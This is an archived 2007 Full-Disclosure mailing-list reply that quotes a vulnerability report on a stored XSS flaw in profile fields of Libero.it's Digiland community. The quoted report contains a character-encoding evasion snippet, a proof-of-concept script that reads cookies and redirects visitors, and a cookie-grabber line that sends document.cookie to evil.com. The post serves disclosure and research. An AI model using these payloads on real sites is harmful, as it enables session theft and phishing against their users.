| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 29 Mar 2007 09:03:45 -0400
From: Kradorex Xeron <admin@...ibase.ca>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Another XSS vulnerability in Italian provider
Libero.it
They probably need to redo their entire site's scripts, I wouldn't doubt
there's a few more exploits in there somewhere. -- 2+ exploits within one
site in one month is pretty sad.
On Wednesday 28 March 2007 12:17, LK wrote:
> After the report of Rosario Valotta on this ML, another XSS vulnerability
> has been found on Libero.it, one of the most important italian ISP
> (www.libero.it).
>
> Nothing more than a trivial error but, since Libero.it staff used the
> printed media to inform that Rosario's find was just a "spot" issue, it is
> important to demonstrate that this kind of errors are quite more
> widespread and to let the Libero staff and management realize that a
> potential attack must be avoid by a deep check of the portal.
>
> The vulnerability once again can be found in the "Community" section
> of Libero portal, and the affected functionality is the profile
> creation and retrieval
>
> <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>.
>
> The implementation of this functionality allows the injection of
> malicious code in the profile, so that an attacker by visiting his/her
> profile can:
>
> 1) steal username (in cookie)
> 2) steal cookies
> 3) arbitrary redirection for Phishing purpose
>
> The normal URL would be something linked like this:
>
> http://digiland.libero.it/profilo.phtml?nick=Nick&top=1
>
> where "Nick" is the name of the nick whose profile has been
> manipulated or crafted to add arbitrary code.
>
> This vulnerability closely resemble to those in MySpace and other
> communities.
> So it's nothing really complicated and you can skip on from here on ;)
>
> In admin pages (need to be logged by creating a fake account) on page
>
> http://digiland.libero.it/profilo_add.php?nocache=1175076655
>
> there are two different fields named "I miei difetti:" (my defects)
> and "i miei pregi:" (my strong points) that accept arbitrary content.
>
> As stated by Rosario, the Libero.it web application performs a simple
> parsing of the posted content, so that quote and double-quote (' and ")
> chars are escaped by putting a \ before of them (both using ASCII and URL
> encoding).
>
> While I already had the Rosario's beautiful implementation of a simple
> evasion technique I preferred to encode the single char in an old
> snippet of mine.
> The aim of the snippet (I don't remember if I made it, stole it, stole
> only the main idea or where, sorry) is to transform a string into a
> series of char numbers to be used with a String.fromCharCode command.
> Due to the limitation in size, the function which create the
> String.fromCharCode sequence is a detached and ascii value is
> decreased of 100 to limit the number of digits.
> This is the creation snippet:
>
> <script>
> var toBenc = "hettp://www.lastknight.com";
> var result = "";
>
> for (var k = 0; k < carlo.length; k++)
> {
> result += ("e(" + (toBenc .charCodeAt(k) - 100) + ")+");
> }
>
> document.write(result + "<br>")
> </script>
>
> So URL "http://www.lastknight.com" is rendered as:
>
> e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)
> +e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)
> +e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
>
>
> Using the two boxes we can use the following code for a POC:
>
> [BOX 1]
> <script>
> function e(A) {
> return String.fromCharCode(A + 100)
> }
> alert(document.cookie);
> </script>
>
> [BOX 2]
> <script>
> var k =
> e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8);
> k +=
> e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
> alert(k);
> window.location = k;
> </script>
>
> The posting url can be easily modified to an http grabber such as:
>
> <http://evil.com/grab?c="+encodeURI(document.cookie);>
>
> or (much more dangerous) to a phishing site.
>
> Session Riding and derived problems have not been tested but many italian
> security experts are working on it.
>
> A POC url is available (until not deleted) here:
>
> <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>
>
> Just my 2 cents and thanks to:
>
> <Rosario Valotta> for the first report, upon which this is based
> <SharDick> for help in JS ;)
> <Vokda && Zen> for consultancy and typo-killing ;)
>
>
> Greetings,
>
> MgpF
>
>
> Permanent Url: <http://www.lastknight.com/libero-xss/>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists